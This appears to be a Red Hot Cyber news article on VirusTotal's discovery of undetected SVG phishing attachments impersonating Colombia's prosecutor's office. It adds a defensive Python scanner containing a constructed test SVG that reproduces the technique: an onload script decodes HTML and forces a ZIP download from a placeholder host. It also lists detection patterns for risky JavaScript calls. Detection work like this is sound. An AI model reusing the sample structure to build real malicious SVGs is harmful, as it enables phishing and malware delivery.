Red Hot Cyber


If Flash is dead, here’s the SVG Assassin! Phishing 2.0 is in high definition.

Redazione RHC : 5 September 2025 17:33

Cybercriminals have launched a new wave of phishing attacks that use SVG files as the delivery vehicle. Researchers at VirusTotal report that the attackers impersonate the Colombian prosecutor's office, sending e-mail attachments whose SVG images carry hidden JavaScript. Automated analysis surfaced behaviour that no antivirus engine flagged.

The SWF format, formally "dead" since Flash was retired at the end of 2020, still shows up in traffic. In 30 days VirusTotal received 47,812 previously unseen unique SWF files, 466 of which were flagged by at least one antivirus engine. In one case only three of 63 engines rated the file "suspicious", pointing to an old vulnerability, but detailed analysis showed it to be a complex game with 3D rendering, audio and a built-in level editor.

Obfuscated classes, the use of RC4/AES and the collection of system information looked alarming, but were consistent with anti-cheat and anti-tampering protection. No malicious behaviour was found in these artifacts.

SVG is the opposite of SWF in both spirit and timing: an open standard that is alive and well in web and design workflows, which is exactly why attackers favour it. Over the past 30 days VirusTotal received 140,803 unique, previously unseen SVG files, 1,442 of which were flagged by at least one engine. One sample was detected by no engine at all, yet when rendered it executed an embedded script that decoded and injected a phishing HTML page imitating the Colombian justice system portal. To add credibility the page simulated a document loading with a progress bar while, in the background, a forced download of a ZIP archive was triggered. The behaviour was confirmed in the sandbox: visual elements, numbers and "security tokens" were all present, even though the file was nominally just an SVG image.

According to VirusTotal, this is not an isolated case. A type:svg query mentioning Colombia returned 44 unique SVGs, none detected by any antivirus engine but all using the same tactics: obfuscation, polymorphism and large amounts of "garbage" code to raise entropy. Even so, the scripts still carried Spanish comments such as "POLIFORMISMO_MASIVO_SEGURO" and "Funciones dummy MASIVAS", an operational slip that a simple YARA rule can key on.
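The two paragraphs above describe both the mechanism (a script that runs when the "image" is rendered, decodes HTML and forces a download) and the attacker's slip (recognisable marker comments and padding code). The following Python triage scanner is an added example, not code from VirusTotal or Red Hot Cyber, showing how a mail gateway or analyst could flag SVG attachments for those traits. The two SVGs it checks are constructed test inputs: the "sample" mimics the described pattern with a harmless decoy page and a placeholder URL (example.invalid), the "clean" one is a static drawing.

```python
"""Triage scanner for SVG e-mail attachments (added example, not VirusTotal's code)."""
import base64
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Constructed decoy payload: a harmless HTML page standing in for the real lure.
_DECOY_HTML = (b"<html><body><h1>Documento</h1>"
               + b"<div class='progress'></div>" * 12 + b"</body></html>")
_DECOY_B64 = base64.b64encode(_DECOY_HTML).decode()

# Constructed sample mimicking the described pattern: onload handler, embedded script,
# atob()+document.write() injection, forced download of a ZIP (URL is a placeholder).
SAMPLE_SVG = """<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1" onload="init()">
  <rect width="1" height="1" fill="white"/>
  <script type="text/javascript"><![CDATA[
    // POLIFORMISMO_MASIVO_SEGURO
    // Funciones dummy MASIVAS
    function d0(){ return 1; } function d1(){ return 2; } function d2(){ return 3; }
    function init(){
      var h = atob("__B64__");
      document.open(); document.write(h); document.close();
      var a = document.createElement("a");
      a.href = "https://example.invalid/doc.zip"; a.download = "doc.zip"; a.click();
    }
  ]]></script>
</svg>""".replace("__B64__", _DECOY_B64)

# Constructed benign control: static shapes only, no script or handlers.
CLEAN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#c00"/><text x="1" y="9">ok</text>
</svg>"""

ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)
MARKERS = ("POLIFORMISMO_MASIVO_SEGURO", "Funciones dummy MASIVAS")  # from the article
JS_APIS = ("atob(", "document.write(", "innerHTML", "fetch(", ".download", "eval(", "unescape(")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
DUMMY_FN = re.compile(r"function\s+\w+\s*\(\s*\)\s*\{\s*return\s+[^;]*;\s*\}")


@dataclass
class Verdict:
    findings: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def scan_svg(data: bytes) -> Verdict:
    """Return every reason the SVG should not be treated as a plain image."""
    v = Verdict()
    text = data.decode("utf-8", "replace")
    try:
        # Caveat: stdlib ElementTree is not hardened against entity-expansion bombs;
        # a production pipeline should parse with defusedxml instead.
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        v.findings.append(f"malformed XML ({exc})")
        root = None
    if root is not None:
        for el in root.iter():
            tag = el.tag.rsplit("}", 1)[-1].lower()
            if tag in ACTIVE_TAGS:
                v.findings.append(f"active content element <{tag}>")
            for name, value in el.attrib.items():
                attr = name.rsplit("}", 1)[-1]
                val = value.strip().lower()
                if EVENT_ATTR.match(attr):
                    v.findings.append(f"event handler {attr}= on <{tag}>")
                elif attr == "href" and val.startswith(("javascript:", "data:text/html")):
                    v.findings.append(f"scriptable href on <{tag}>: {val[:20]}...")
    for m in MARKERS:
        if m in text:
            v.findings.append(f"known marker string {m!r}")
    for api in JS_APIS:
        if api in text:
            v.findings.append(f"script API {api!r}")
    # Long base64 runs are decoded to see whether they hide an HTML document.
    for blob in B64_BLOB.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True)
        except ValueError:
            continue
        if re.search(rb"<(html|script|body|form)\b", decoded, re.I):
            v.findings.append(f"base64 blob ({len(blob)} chars) decodes to HTML")
    # Padding made of trivial functions is the "garbage code" the article mentions.
    dummies = len(DUMMY_FN.findall(text))
    if dummies >= 3:
        v.findings.append(f"{dummies} trivial padding functions")
    return v


if __name__ == "__main__":
    for label, svg in (("sample", SAMPLE_SVG), ("clean", CLEAN_SVG)):
        verdict = scan_svg(svg.encode())
        print(label, "SUSPICIOUS" if verdict.suspicious else "clean")
        for f in verdict.findings:
            print("  -", f)
```

The structural checks (script elements, `on*` handlers, `javascript:`/`data:text/html` hrefs) are the durable part: they catch any SVG that can run code when rendered, regardless of what the attacker renames. The marker strings and dummy-function count are campaign-specific and will age out once the comments are stripped, which is why they are reported as separate findings rather than folded into one score.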

Extending the search to a full year yielded 523 results. The oldest sample was dated August 14, 2025, also submitted from Colombia and also undetected; re-analysis confirmed the same phishing and silent-download pattern. The early samples were large, around 25 MB, and shrank over time, indicating that the payload was being refined.

The distribution channel was e-mail, which let the researchers tie the chain together using sender metadata, subject lines and attachment names.
